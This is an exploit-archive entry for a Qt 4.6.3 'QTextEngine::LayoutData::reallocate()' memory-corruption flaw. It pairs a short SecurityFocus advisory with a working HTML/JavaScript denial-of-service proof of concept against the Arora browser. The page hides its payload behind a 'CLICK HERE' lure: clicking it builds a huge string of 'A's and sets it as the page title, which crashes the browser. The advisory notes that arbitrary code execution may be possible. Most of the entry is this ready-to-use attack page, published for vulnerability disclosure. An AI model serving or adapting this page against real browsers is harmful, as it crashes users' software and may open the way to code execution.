Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption

Author: D4rk357
type: dos
platform: linux
port: 
date_added: 2010-07-13 
date_updated: 2014-08-19 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>